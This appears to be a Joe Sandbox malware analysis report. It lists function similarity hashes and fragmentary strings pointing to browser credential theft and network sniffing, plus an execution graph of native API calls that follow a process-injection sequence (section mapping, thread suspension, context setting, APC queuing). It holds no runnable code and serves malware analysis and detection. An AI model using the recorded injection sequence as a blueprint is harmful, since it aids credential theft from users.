                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                    • API String ID: 0-639201278
                                                                                                                                                                                    • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                    • Instruction ID: aecf7b78064926a0ed2bf5504bc2240329fb9bca841afbee7aaf85693517bec6
                                                                                                                                                                                    • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                    • Instruction Fuzzy Hash: AEC19F74628A198FC758EF68D499AAAB3E1FF98305F54432D950EC7352DF30A902CB85
                                                                                                                                                                                    Function 081FBCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                    • API String ID: 0-2058692283
                                                                                                                                                                                    • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                    • Instruction ID: 74c7a73cca293fbbad4bc4c310d2202e0faed0ad6ff8fe635a19e5ad72301191
                                                                                                                                                                                    • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                    • Instruction Fuzzy Hash: EEA1A07061874C8BDB18EFA8D444BEEB7E1FF88311F40462DE48AD7292EF7095468B85
                                                                                                                                                                                    Function 081FBCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                    • API String ID: 0-2058692283
                                                                                                                                                                                    • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                    • Instruction ID: 6c541dd120486b261ae295609088ec3774f5120ecbff87f7b2b867aabded020f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D91817061874C8BDB18EFA8D444BEEB7E1FF88311F40462DE48AD7292EF7095468B85
                                                                                                                                                                                    Function 081FB352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $.$e$n$v
                                                                                                                                                                                    • API String ID: 0-1849617553
                                                                                                                                                                                    • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                    • Instruction ID: d451b0a8e9bb2ef1bc0563aea8155f56cee940fbec99e610db189f328339b625
                                                                                                                                                                                    • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F719235618B488FD758EFA8C4887AAB7F1FF58305F00062FD44AC7262EB75D9468B81
                                                                                                                                                                                    Function 081F6C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                    • API String ID: 0-1970020201
                                                                                                                                                                                    • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                    • Instruction ID: 91dd595d41e329c6005de86fe2bb807a8f0135e2a81fbd8952b7f4a3a4425ecc
                                                                                                                                                                                    • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F5190B0914B0C8FCB54EFA8D045AEEB7F1FF58301F40462E949AE7254EF7095418B89
                                                                                                                                                                                    Function 081F786F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                    • API String ID: 0-1610437797
                                                                                                                                                                                    • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                    • Instruction ID: 9eaa872854384cffd53d20126d8281fb86a256252e890f74122dd448718345d6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21417334218B8C8BDB65EF6898457EA73E4FF94301F454A2E994EC7241EF70D505CB82
                                                                                                                                                                                    Function 081F94B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                    • API String ID: 0-327345718
                                                                                                                                                                                    • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                    • Instruction ID: b2e209072fbd08ce9bf763c3351d9689d4405f1006a92a9172ef30e34b95b09a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B415C30A18E0D8FCB58EF6890A47AD77E1FF58316F40416EA90ED7261DF71C5428B86
                                                                                                                                                                                    Function 081F7432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .dll$el32$h$kern
                                                                                                                                                                                    • API String ID: 0-4264704552
                                                                                                                                                                                    • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                    • Instruction ID: 5862f81190bf5a96001e16133a08b49eb1e6ab1195b1b47d7cd7ec2f9c9489ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 75416F70608B888FD769DF6C84843BAB7E1FF98301F144A7E959AC22A6DB70C545CB51
                                                                                                                                                                                    Function 081FE0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $Snif$f fr$om:
                                                                                                                                                                                    • API String ID: 0-3434893486
                                                                                                                                                                                    • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                    • Instruction ID: f6422f449d241ca1550db471b57d27e467fe4b6117772e5f44792d7edf8d62dd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3231C57551CB885FD71ADB28C4886DAB7D4FB94300F50492EE49BC7392EE30A54ACB42
                                                                                                                                                                                    Function 081FE0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $Snif$f fr$om:
                                                                                                                                                                                    • API String ID: 0-3434893486
                                                                                                                                                                                    • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                    • Instruction ID: c9a9c1e3c3233ee2d93060ec9009bcb745810055cdc083dec4ccc0cfdb2b99e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6131C47551CB486FD71ADB28C4886EAB7D5FB94301F50492EE49BC7392EE30A506CE42
                                                                                                                                                                                    Function 081F9FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                    • API String ID: 0-3136806129
                                                                                                                                                                                    • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                    • Instruction ID: 09d962a3e3a30fcd149ba04eeb2ad98211c52b855b4d8bbbe99924c2858d65cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C316B74118B588FCB84EF689498BAAB7E1FF98202F84063D994ECB356DF30D545CB52
                                                                                                                                                                                    Function 081F9FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                    • API String ID: 0-3136806129
                                                                                                                                                                                    • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                    • Instruction ID: 1eded8bd03314baca6c4b21d4d1ee1cf873d67bb4b87fa5ebd8e7d33dfe214dd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 58316B74118B588FCB84EF689498AAAB7E1FF98201F84063D994ACB356DF30C545CB52
                                                                                                                                                                                    Function 081FC8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                    • API String ID: 0-319646191
                                                                                                                                                                                    • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                    • Instruction ID: 7f55afeba025f6a17e6fddae2b6cabe23c95209a4f0a428add0574778c9ba88f
                                                                                                                                                                                    • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9631D171614A0C8BCB05EFA8C8887EDBBE1FF58215F40022AD44ED7341DF748645CB99
                                                                                                                                                                                    Function 081FC8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                    • API String ID: 0-319646191
                                                                                                                                                                                    • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                    • Instruction ID: 6df450dc8c1930ec53fb29e21dd79c8f2222923221c31d95ba3388bc28dc85ea
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1221E470610A1C8BCB05EFA8C8887EDBBE5FF58305F40422AD45AD7391DF748605CB99
                                                                                                                                                                                    Function 081FDE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .$l$l$t
                                                                                                                                                                                    • API String ID: 0-168566397
                                                                                                                                                                                    • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                    • Instruction ID: 481d08bee0599525db82fcd6d195f087c2913d5e4973ee9d905f4b7d297524f2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                    • Instruction Fuzzy Hash: A8218B74A24A0D9BDB08EFA8D048BEEBBF1FF18305F50462ED009D3741DB7495518B84
                                                                                                                                                                                    Function 081FDE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .$l$l$t
                                                                                                                                                                                    • API String ID: 0-168566397
                                                                                                                                                                                    • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                    • Instruction ID: f0a71c80737f853db9b2f0a98a70c4566ce600b03d51a5ea6bd93c1ad4de78ee
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                    • Instruction Fuzzy Hash: F4217A74A24A0D9BDB08EFA8D048BAEBAF1FF18305F50462ED009D3741DB7495918B84
                                                                                                                                                                                    Function 081FDFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: auth$logi$pass$user
                                                                                                                                                                                    • API String ID: 0-2393853802
                                                                                                                                                                                    • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                    • Instruction ID: ffe0a3ea1529da3cc3d50c741c2c59fec1313157538f33ca119be6031143f1e6
                                                                                                                                                                                    • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A21AC70724B0D8BCB05DF9D98806AEB7E1EF88344F004A1AA40AEB356D7B0D9158BC2

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:1.5%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:9%
                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                    Total number of Nodes:398
                                                                                                                                                                                    Total number of Limit Nodes:56
                                                                                                                                                                                    execution_graph 120925 204cb84 120928 204a042 120925->120928 120927 204cba5 120929 204a06b 120928->120929 120930 204a182 NtQueryInformationProcess 120929->120930 120941 204a56c 120929->120941 120931 204a1ba 120930->120931 120932 204a2fc NtSuspendThread 120931->120932 120934 204a1ef 120931->120934 120933 204a30d 120932->120933 120935 204a331 120932->120935 120933->120927 120934->120927 120938 204a412 120935->120938 120944 2049bb2 120935->120944 120937 204a531 120940 204a552 NtResumeThread 120937->120940 120938->120937 120939 204a4a6 NtSetContextThread 120938->120939 120943 204a4bd 120939->120943 120940->120941 120941->120927 120942 204a51c NtQueueApcThread 120942->120937 120943->120937 120943->120942 120945 2049bf7 120944->120945 120946 2049c66 NtCreateSection 120945->120946 120947 2049ca0 120946->120947 120948 2049d4e 120946->120948 120949 2049cc1 NtMapViewOfSection 120947->120949 120948->120938 120949->120948 120950 2049d0c 120949->120950 120950->120948 120951 2049d88 120950->120951 120952 2049dc5 NtClose 120951->120952 120952->120938 120953 9f19d 120956 9b9a0 120953->120956 120955 9f1a2 120957 9b9c6 120956->120957 120962 89d40 120957->120962 120959 9b9d2 120961 9b9f6 120959->120961 120968 88f30 120959->120968 120961->120955 120998 89c90 120962->120998 120964 89d54 120964->120959 120965 89d4d 120965->120964 121005 8f180 120965->121005 120972 88f57 120968->120972 120970 88ffc 121258 8f410 120970->121258 120993 890f2 120972->120993 121248 8f380 120972->121248 120973 89006 120974 9bf60 RtlAllocateHeap 120973->120974 120973->120993 120975 8902a 120974->120975 120976 9bf60 RtlAllocateHeap 120975->120976 120977 8903b 120976->120977 120978 9bf60 RtlAllocateHeap 120977->120978 120979 8904c 120978->120979 121268 8ca90 120979->121268 120981 89059 120982 94a50 7 API calls 120981->120982 120983 89066 120982->120983 120984 94a50 7 API calls 120983->120984 120985 89077 120984->120985 120986 89084 120985->120986 120987 890a5 120985->120987 121274 8d620 120986->121274 120988 94a50 7 API calls 120987->120988 120990 890c1 120988->120990 120997 890e9 120990->120997 121295 8d6c0 NtClose LdrInitializeThunk LdrInitializeThunk 120990->121295 120991 88d00 22 API calls 120991->120993 120992 8908b 121278 88d00 120992->121278 120993->120961 120997->120991 120999 89ca3 120998->120999 121000 89cb6 120999->121000 121013 9b280 120999->121013 121000->120965 121002 89cf3 121002->121000 121024 89ab0 121002->121024 121004 89d13 121004->120965 121006 8f199 121005->121006 121012 89d65 121006->121012 121240 9a7a0 121006->121240 121008 8f1d2 121009 8f1fd 121008->121009 121243 9a230 121008->121243 121011 9a460 NtClose 121009->121011 121011->121012 121012->120959 121014 9b299 121013->121014 121030 94a50 121014->121030 121016 9b2b1 121017 9b2ba 121016->121017 121059 9b0c0 121016->121059 121017->121002 121019 9b2ce 121019->121017 121073 99ed0 121019->121073 121027 89aca 121024->121027 121219 87ea0 121024->121219 121026 89ad1 121026->121004 121027->121026 121232 88160 121027->121232 121031 94b73 121030->121031 121032 94a64 121030->121032 121031->121016 121032->121031 121080 9a330 121032->121080 121034 94bb7 121035 9bd90 RtlFreeHeap 121034->121035 121037 94bc3 121035->121037 121036 94d49 121039 9a460 NtClose 121036->121039 121037->121031 121037->121036 121038 94d5f 121037->121038 121043 94c52 121037->121043 121129 94790 NtReadFile NtClose 121038->121129 121040 94d50 121039->121040 121040->121016 121042 94d72 121042->121016 121044 94cb9 121043->121044 121045 94c61 121043->121045 121044->121036 121051 94ccc 121044->121051 121046 94c7a 121045->121046 121047 94c66 121045->121047 121049 94c7f 121046->121049 121050 94c97 121046->121050 121125 94650 NtClose LdrInitializeThunk LdrInitializeThunk 121047->121125 121083 946f0 121049->121083 121050->121040 121093 94410 121050->121093 121126 9a460 121051->121126 121052 94c70 121052->121016 121054 94c8d 121054->121016 121057 94caf 121057->121016 121058 94d38 121058->121016 121060 9b0d1 121059->121060 121061 9b0e3 121060->121061 121147 9bd10 121060->121147 121061->121019 121063 9b104 121150 94070 121063->121150 121065 9b150 121065->121019 121066 9b127 121066->121065 121067 94070 2 API calls 121066->121067 121068 9b149 121067->121068 121068->121065 121182 95390 121068->121182 121070 9b1da 121192 99e90 121070->121192 121074 99eec 121073->121074 121215 229fae8 LdrInitializeThunk 121074->121215 121075 99f07 121077 9bd90 121075->121077 121078 9b329 121077->121078 121216 9a640 121077->121216 121078->121002 121130 9af30 121080->121130 121082 9a34c NtCreateFile 121082->121034 121084 9470c 121083->121084 121085 94748 121084->121085 121086 94734 121084->121086 121087 9a460 NtClose 121085->121087 121088 9a460 NtClose 121086->121088 121089 94751 121087->121089 121090 9473d 121088->121090 121132 9bfa0 RtlAllocateHeap 121089->121132 121090->121054 121092 9475c 121092->121054 121094 9445b 121093->121094 121095 9448e 121093->121095 121097 9a460 NtClose 121094->121097 121096 944aa 121095->121096 121101 945d9 121095->121101 121099 944cc 121096->121099 121100 944e1 121096->121100 121098 9447f 121097->121098 121098->121057 121102 9a460 NtClose 121099->121102 121103 944fc 121100->121103 121104 944e6 121100->121104 121105 9a460 NtClose 121101->121105 121106 944d5 121102->121106 121113 94501 121103->121113 121133 9bf60 121103->121133 121107 9a460 NtClose 121104->121107 121108 94639 121105->121108 121106->121057 121109 944ef 121107->121109 121108->121057 121109->121057 121112 94567 121114 9459a 121112->121114 121115 94585 121112->121115 121118 94513 121113->121118 121136 9a3e0 121113->121136 121117 9a460 NtClose 121114->121117 121116 9a460 NtClose 121115->121116 121116->121118 121119 945a3 121117->121119 121118->121057 121120 945cf 121119->121120 121139 9bb60 121119->121139 121120->121057 121122 945ba 121123 9bd90 RtlFreeHeap 121122->121123 121124 945c3 121123->121124 121124->121057 121125->121052 121127 9af30 121126->121127 121128 9a47c NtClose 121127->121128 121128->121058 121129->121042 121131 9af40 121130->121131 121131->121082 121132->121092 121135 9bf78 121133->121135 121144 9a600 121133->121144 121135->121113 121137 9a3fc NtReadFile 121136->121137 121138 9af30 121136->121138 121137->121112 121138->121137 121140 9bb84 121139->121140 121141 9bb6d 121139->121141 121140->121122 121141->121140 121142 9bf60 RtlAllocateHeap 121141->121142 121143 9bb9b 121142->121143 121143->121122 121145 9a61c 121144->121145 121146 9a61f RtlAllocateHeap 121145->121146 121146->121135 121148 9bd3d 121147->121148 121196 9a510 121147->121196 121148->121063 121151 94089 121150->121151 121152 94081 121150->121152 121153 9435c 121151->121153 121199 9cf00 121151->121199 121152->121066 121153->121066 121155 940dd 121156 9cf00 RtlAllocateHeap 121155->121156 121159 940e8 121156->121159 121157 94136 121160 9cf00 RtlAllocateHeap 121157->121160 121159->121157 121161 9d030 2 API calls 121159->121161 121213 9cfa0 RtlAllocateHeap RtlFreeHeap 121159->121213 121163 9414a 121160->121163 121161->121159 121162 941a7 121164 9cf00 RtlAllocateHeap 121162->121164 121163->121162 121204 9d030 121163->121204 121165 941bd 121164->121165 121167 941fa 121165->121167 121169 9d030 2 API calls 121165->121169 121168 9cf00 RtlAllocateHeap 121167->121168 121170 94205 121168->121170 121169->121165 121171 9d030 2 API calls 121170->121171 121177 9423f 121170->121177 121171->121170 121174 9cf60 RtlFreeHeap 121175 9433e 121174->121175 121176 9cf60 RtlFreeHeap 121175->121176 121178 94348 121176->121178 121210 9cf60 121177->121210 121179 9cf60 RtlFreeHeap 121178->121179 121180 94352 121179->121180 121181 9cf60 RtlFreeHeap 121180->121181 121181->121153 121183 953a1 121182->121183 121184 94a50 7 API calls 121183->121184 121185 953b7 121184->121185 121186 953f2 121185->121186 121187 95405 121185->121187 121191 9540a 121185->121191 121188 9bd90 RtlFreeHeap 121186->121188 121189 9bd90 RtlFreeHeap 121187->121189 121190 953f7 121188->121190 121189->121191 121190->121070 121191->121070 121193 99eac 121192->121193 121214 229fdc0 LdrInitializeThunk 121193->121214 121194 99ec3 121194->121019 121197 9af30 121196->121197 121198 9a52c NtAllocateVirtualMemory 121197->121198 121198->121148 121200 9cf10 121199->121200 121201 9cf16 121199->121201 121200->121155 121202 9bf60 RtlAllocateHeap 121201->121202 121203 9cf3c 121202->121203 121203->121155 121205 9cfa0 121204->121205 121206 9bf60 RtlAllocateHeap 121205->121206 121207 9cffd 121205->121207 121208 9cfda 121206->121208 121207->121163 121209 9bd90 RtlFreeHeap 121208->121209 121209->121207 121211 9bd90 RtlFreeHeap 121210->121211 121212 94334 121211->121212 121212->121174 121213->121159 121214->121194 121215->121075 121217 9a65c RtlFreeHeap 121216->121217 121218 9af30 121216->121218 121217->121078 121218->121217 121220 87eab 121219->121220 121221 87eb0 121219->121221 121220->121027 121222 9bd10 NtAllocateVirtualMemory 121221->121222 121225 87ed5 121222->121225 121223 87f38 121223->121027 121224 99e90 LdrInitializeThunk 121224->121225 121225->121223 121225->121224 121226 87f3e 121225->121226 121230 9bd10 NtAllocateVirtualMemory 121225->121230 121235 9a590 121225->121235 121228 87f64 121226->121228 121229 9a590 LdrInitializeThunk 121226->121229 121228->121027 121231 87f55 121229->121231 121230->121225 121231->121027 121233 9a590 LdrInitializeThunk 121232->121233 121234 8817e 121233->121234 121234->121004 121236 9a5ac 121235->121236 121239 229fb68 